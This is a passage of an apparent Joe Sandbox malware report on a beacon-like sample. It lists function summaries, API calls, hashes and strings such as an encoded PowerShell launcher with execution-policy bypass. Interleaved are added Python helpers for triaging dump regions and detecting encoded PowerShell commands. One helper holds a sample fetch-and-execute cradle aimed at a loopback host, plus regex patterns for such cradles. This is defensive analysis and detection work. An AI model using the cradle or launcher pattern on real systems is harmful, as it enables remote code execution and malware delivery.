                        • free.LIBCMT ref: 00CE42AF
                        • free.LIBCMT ref: 00CE42B7
                        • free.LIBCMT ref: 00CE42BF
                        • free.LIBCMT ref: 00CE42CB
                        • free.LIBCMT ref: 00CE42D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc$AllocHeap
                        • String ID:
                        • API String ID: 996410232-0
                        • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                        • Instruction ID: 8beb22b2e64b3ed646bb8af13dc27135fc067ea10b42686e62443fa570941f66
                        • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                        • Instruction Fuzzy Hash: D241F3263007D98BDB59DBA7A99036E6750FB49BC0F404525EF6647B15DF38D923C700
                        APIs
                        • malloc.LIBCMT ref: 00A335BD
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A335C8
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • free.LIBCMT ref: 00A336AF
                        • free.LIBCMT ref: 00A336B7
                        • free.LIBCMT ref: 00A336BF
                        • free.LIBCMT ref: 00A336CB
                        • free.LIBCMT ref: 00A336D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc
                        • String ID:
                        • API String ID: 2761444284-0
                        • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                        • Instruction ID: 89eaaa70b2f41fbf1d0935616a10ba66f13aec733d96db1baeb8e001679bcb93
                        • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                        • Instruction Fuzzy Hash: FC41F123308791AFDF15DF269A6236A6760FB59BC4F544024EF5A4B701EF38DA22C704
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: htonl$freemalloc
                        • String ID: zyxwvutsrqponmlk
                        • API String ID: 1249573706-3884694604
                        • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                        • Instruction ID: 946d5d0cb5c23db5468426f7a9c2101392ed4665bf58bf2c204d1a47e7855c56
                        • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                        • Instruction Fuzzy Hash: 6B21F66230178846DB54EB76E55133DAA91EB89BD0F044538AF9E8776BEF3CC9079301
                        APIs
                        • GetModuleHandleA.KERNEL32 ref: 00CF3FE7
                        • GetProcAddress.KERNEL32 ref: 00CF3FF7
                        • GetLastError.KERNEL32 ref: 00CF40BF
                          • Part of subcall function 00CFCC00: GetCurrentProcess.KERNEL32 ref: 00CFCC8D
                          • Part of subcall function 00CFD134: GetCurrentProcess.KERNEL32 ref: 00CFD161
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                        • String ID: NtMapViewOfSection$ntdll.dll
                        • API String ID: 1006775078-3170647572
                        • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                        • Instruction ID: 564159eeee3ac76b4a36b54eeed900d7c0984679f6e03a1d8432079245371aa7
                        • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                        • Instruction Fuzzy Hash: 2331DE32710B4882EB14EB62E45977A77A0F788BB4F04072AEF6907B95DF7DC5468B00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: signal
                        • String ID: CCG
                        • API String ID: 1946981877-1584390748
                        • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                        • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
                        • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                        • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
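The "Source File" names in this listing encode where each dumped region lived in the process: field 4 is the region base, field 5 lines up with the Win32 PAGE_* protection constants (0x40 = PAGE_EXECUTE_READWRITE for the 0xCE0000 dump, 0x20 = PAGE_EXECUTE_READ for 0xA30000 and the 0x401000 image section) and field 7 with the MEM_* region types (0x20000 = MEM_PRIVATE, 0x1000000 = MEM_IMAGE). A PE header ("based on PE: true") sitting in private, non-file-backed memory is the signature of a reflectively loaded or unpacked payload, which is why the two private regions are the ones worth carving for the beacon config. The helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses these lines and ranks the regions. The meaning of fields 1-3, 6 and 8 is not documented on this page, so the code carries them through uninterpreted (that is an assumption, not a statement about the format); the three sample lines are copied from the listing above.

```python
"""Triage helper for Joe Sandbox "Source File" dump names (added example).

A name such as
  00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp
has eight dot-separated fields. Field 4 is the region base, field 5 a PAGE_*
protection value and field 7 a MEM_* region type. Fields 1-3, 6 and 8 are not
interpreted here (assumption: the page does not document them).
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0xF0   # any PAGE_EXECUTE* value
WRITE_MASK = 0xCC  # PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int          # field 4: base address of the dumped region
    protect: int       # field 5: PAGE_* protection at dump time
    mem_type: int      # field 7: MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    module_base: int   # "Offset:" value, the image base the dump is rebased on
    based_on_pe: bool  # the sandbox found a PE header for this region

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:X}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def rwx(self) -> bool:
        return bool(self.protect & EXEC_MASK) and bool(self.protect & WRITE_MASK)


def parse_source_line(line: str) -> DumpRegion:
    """Parse one '• Source File: ... .sdmp, Offset: ..., based on PE: ...' line."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    fields = m["name"].split(".")
    if len(fields) != 9 or fields[-1].lower() != "sdmp":
        raise ValueError(f"unexpected dump name layout: {m['name']}")
    return DumpRegion(
        name=m["name"],
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        mem_type=int(fields[6], 16),
        module_base=int(m["offset"], 16),
        based_on_pe=m["pe"].lower() == "true",
    )


def triage(region: DumpRegion) -> str:
    """Classify a dumped region the way an analyst decides what to carve first."""
    if region.based_on_pe and region.mem_type == 0x20000:
        # A PE header in private (non-file-backed) memory was written there by the
        # process itself: reflective loading, manual mapping or unpacking.
        verdict = "PE in private memory: likely injected or unpacked payload"
        return verdict + " (RWX)" if region.rwx else verdict
    if region.mem_type == 0x1000000:
        return "file-backed image section: module loaded from disk"
    return "no PE header or unclassified region"


# Copied from the Source File lines in this report.
SAMPLE_LINES = [
    "• Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true",
    "• Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true",
    "• Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true",
]


def triage_report(lines=SAMPLE_LINES) -> dict:
    """Map each region base to its verdict; the private-memory hits are carved first."""
    return {r.base: triage(r) for r in map(parse_source_line, lines)}


if __name__ == "__main__":
    for base, verdict in triage_report().items():
        print(f"{base:#010x}: {verdict}")
```

Run against the three lines, the 0xCE0000 and 0xA30000 regions come back as PE images in private memory (the first one RWX), while 0x401000 is the .text section of the on-disk 121.exe image; that ordering is the one to follow when extracting the beacon for configuration parsing.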
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: strtok$_getptd_time64malloc
                        • String ID: eThreadpoolTimer
                        • API String ID: 1522986614-2707337283
                        • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                        • Instruction ID: aab378bbd2f5bb49b28fcc4ca7f9c8f9872a78dbb095bb068b350cc617c92290
                        • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                        • Instruction Fuzzy Hash: 0721D3B6A10BE485DB00DF12E18866DB7A8F7D9FE4B1A4626EF5A87781CF34C441C780
                        APIs
                        • malloc.LIBCMT ref: 00CF1FD2
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • _snprintf.LIBCMT ref: 00CF1FF1
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • remove.LIBCMT ref: 00CF1FFD
                        • remove.LIBCMT ref: 00CF2004
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                        • String ID: %s\%s
                        • API String ID: 1896346573-4073750446
                        • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                        • Instruction ID: 523190a57e436a7cf21d3df236ec1cdea42779637293abb7bd57914ce42cee6a
                        • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                        • Instruction Fuzzy Hash: B9F0BE36208B8486D340EB52B80137AA360EB88FC0F584135BF8C57B5ACE78C4128755
                        APIs
                        • malloc.LIBCMT ref: 00A413D2
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • _snprintf.LIBCMT ref: 00A413F1
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • remove.LIBCMT ref: 00A413FD
                        • remove.LIBCMT ref: 00A41404
                        Strings
                        • uld not open process: %d (%u), xrefs: 00A413D7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                        • String ID: uld not open process: %d (%u)
                        • API String ID: 2566950902-823969559
                        • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                        • Instruction ID: 24824ce2642e373deb3243d87c0f3a240a986fbea6155a1169621cd329c6a0c0
                        • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                        • Instruction Fuzzy Hash: 7DF0586A609B908AD200EB52B91136AA760FBD8FD0F6C4131FF8917B1ADF38C4518B84
                        APIs
                        • _snprintf.LIBCMT ref: 00A3DB25
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                          • Part of subcall function 00A46F38: _snprintf.LIBCMT ref: 00A470A5
                        • _snprintf.LIBCMT ref: 00A3DBBD
                          • Part of subcall function 00A42170: strchr.LIBCMT ref: 00A421D6
                          • Part of subcall function 00A42170: _snprintf.LIBCMT ref: 00A4220C
                          • Part of subcall function 00A4200C: strchr.LIBCMT ref: 00A42069
                          • Part of subcall function 00A4200C: _snprintf.LIBCMT ref: 00A420B3
                        • _snprintf.LIBCMT ref: 00A3DBD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                        • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                        • API String ID: 199363273-1250630670
                        • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                        • Instruction ID: 0ea23a836a3801df021322add84faba297a32a2734943c90e504bac5578d3bb8
                        • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                        • Instruction Fuzzy Hash: B761DB32314B8086EB10DF62E9407AEB7A1F789BD8F884126EE4E57B58DF78C905C740
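The function above formats the launcher `rshell -nop -exec bypass -EncodedCommand "%s"` (the string is truncated on the page; the `$` in the String ID line separates it from the second fragment `/'); %s`). The detector below is an added example, not code from the report or from the sample: it scans process command lines for that launcher shape, decodes the `-EncodedCommand` argument (base64 of UTF-16LE text) and looks for a download cradle in the result. It assumes the full command line begins with `powershell`, which the truncated string does not show, and the command lines it scans are constructed here for the example, with the encoded payload built by the same helper so nothing is hand-typed.

```python
"""Detect and decode PowerShell launchers of the form
    powershell -nop -exec bypass -EncodedCommand "<base64>"
Added example, not part of the sandbox report. Assumption: the process name is
powershell (the report only shows the "...rshell" tail of the format string).
"""
import base64
import re

# Flags in the report's format string plus the short aliases PowerShell accepts.
ENC_RE = re.compile(r'-(?:EncodedCommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)"?', re.IGNORECASE)
NOP_RE = re.compile(r"-nop\b|-noprofile\b", re.IGNORECASE)
BYPASS_RE = re.compile(r"-exec(?:utionpolicy)?\s+bypass\b", re.IGNORECASE)
CRADLE_RE = re.compile(r"\bIEX\b|Invoke-Expression|DownloadString|Net\.WebClient", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE script text, base64-encoded."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_cmdline(cmdline: str) -> dict:
    """Score one process command line and return the decoded script when present."""
    hits = []
    if NOP_RE.search(cmdline):
        hits.append("no-profile")
    if BYPASS_RE.search(cmdline):
        hits.append("execution-policy-bypass")
    script = None
    m = ENC_RE.search(cmdline)
    if m:
        hits.append("encoded-command")
        try:
            script = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            # Malformed base64 or odd-length UTF-16 is itself worth a look.
            hits.append("encoded-command-undecodable")
        else:
            if CRADLE_RE.search(script):
                hits.append("download-cradle")
    # An encoded command on its own is common admin practice; it becomes suspicious
    # in combination with the evasion flags or a cradle in the decoded script.
    suspicious = "encoded-command" in hits and len(hits) >= 2
    return {"cmdline": cmdline, "hits": hits, "script": script, "suspicious": suspicious}


def scan(cmdlines) -> list:
    return [analyze_cmdline(c) for c in cmdlines]


# Constructed sample input: a loopback cradle in the launcher shape from the report,
# a benign -EncodedCommand use, and an ordinary interactive invocation.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/'); Start-Sleep -s 5"
SAMPLE_CMDLINES = [
    f'powershell -nop -exec bypass -EncodedCommand "{encode_command(SAMPLE_SCRIPT)}"',
    f"powershell.exe -EncodedCommand {encode_command('Get-Service | Where-Object Status -eq Running')}",
    "powershell.exe -NoLogo -Command Get-Date",
]


if __name__ == "__main__":
    for result in scan(SAMPLE_CMDLINES):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"[{flag}] {result['hits']}")
        if result["script"]:
            print("   decoded:", result["script"])
```

Feed it Sysmon event 1 or 4688 command lines; the decoded script is what you want in the alert, since the base64 blob alone tells a responder nothing.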
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                        • Instruction ID: 9ff6eda95270f2d6c4a05488708a2904a5503ed6e74e2c496ce7e2ae06040419
                        • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                        • Instruction Fuzzy Hash: FC514162B00A4896DF40EB75C4412FD6360FB95BC8F909226EF0E2771AEF38C64AD741
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1640621425-0
                        • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                        • Instruction ID: a1d2303ba67936e096d0aa2eba20f3dca8426ea77545dda8ebc1e60e90eac019
                        • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                        • Instruction Fuzzy Hash: FC312B2130074097DF289E27954436EBA52F7C4FE0F5C82249F9E47BD1DB7CD4918A60
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1640621425-0
                        • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                        • Instruction ID: 7d200ce09953a15ffe1e03d84557899fb91f4250a3783a1dd5263f4add95d4c5
                        • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                        • Instruction Fuzzy Hash: 8B312A393007408EDE289F27DA5426EB691F7C5FE4F1C96349F6A47B91EB78C8868340
                        APIs
                        • malloc.LIBCMT ref: 00CE553A
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CE5545
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
                        • free.LIBCMT ref: 00CE562C
                        • free.LIBCMT ref: 00CE5634
                        • free.LIBCMT ref: 00CE5640
                        • free.LIBCMT ref: 00CE564D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc$AllocHeap
                        • String ID:
                        • API String ID: 996410232-0
                        • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                        • Instruction ID: 4f7598e5cd93667dc81e9b3743aeaec4dfb0153b7d257390b9aef767d18ff610
                        • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                        • Instruction Fuzzy Hash: CB312222304BC946DF16DB6B981076A6B59FB95BCCF894035EE668B705EF38CA07C310
                        APIs
                        • malloc.LIBCMT ref: 00A3493A
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A34945
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • free.LIBCMT ref: 00A34A2C
                        • free.LIBCMT ref: 00A34A34
                        • free.LIBCMT ref: 00A34A40
                        • free.LIBCMT ref: 00A34A4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc
                        • String ID:
                        • API String ID: 2761444284-0
                        • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                        • Instruction ID: 0550d051feff97064164caccb3afb7c1f07435c0bc5a553d8104f98f54d6b570
                        • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                        • Instruction Fuzzy Hash: F43126227187C586DF15DF26A91072EAB99F7A9FC8F1A8030ED598B701EE38D907C705
                        APIs
                          • Part of subcall function 00CF31F4: strchr.LIBCMT ref: 00CF322E
                          • Part of subcall function 00CF31F4: strchr.LIBCMT ref: 00CF324C
                          • Part of subcall function 00CF31F4: malloc.LIBCMT ref: 00CF3264
                          • Part of subcall function 00CF31F4: malloc.LIBCMT ref: 00CF3271
                          • Part of subcall function 00CF31F4: rand.LIBCMT ref: 00CF333D
                        • strchr.LIBCMT ref: 00CF2DD6
                        • _snprintf.LIBCMT ref: 00CF2E0C
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • _snprintf.LIBCMT ref: 00CF2E23
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                        • String ID: %s&%s$?%s
                        • API String ID: 1095232423-1750478248
                        • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                        • Instruction ID: f5027851233bc5b72d8b731af81ea7db61534e885027deef56f1e3f07911d2ef
                        • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                        • Instruction Fuzzy Hash: 11418F66604E8891DA519F2ED1452F8B3B1FF98B95F085522DF4967B20EF34D2B3D340
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                        • String ID:
                        • API String ID: 2998201375-0
                        • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                        • Instruction ID: f6e8c2369b05f827054c33a638f4308e87967b51e1c2d43f16b7582b737567f0
                        • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                        • Instruction Fuzzy Hash: 6331C1362047818ADB208F19E58076DBBA5FB85FD0F1D4226EB8D57FA5EB38C841C721
                        APIs
                        • malloc.LIBCMT ref: 00A3F085
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • free.LIBCMT ref: 00A3F0C0
                        • fwrite.LIBCMT ref: 00A3F101
                        • fclose.LIBCMT ref: 00A3F109
                        • free.LIBCMT ref: 00A3F116
                          • Part of subcall function 00A4E644: _errno.LIBCMT ref: 00A4E664
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$free$_callnewhfclosefwritemalloc
                        • String ID:
                        • API String ID: 1696598829-0
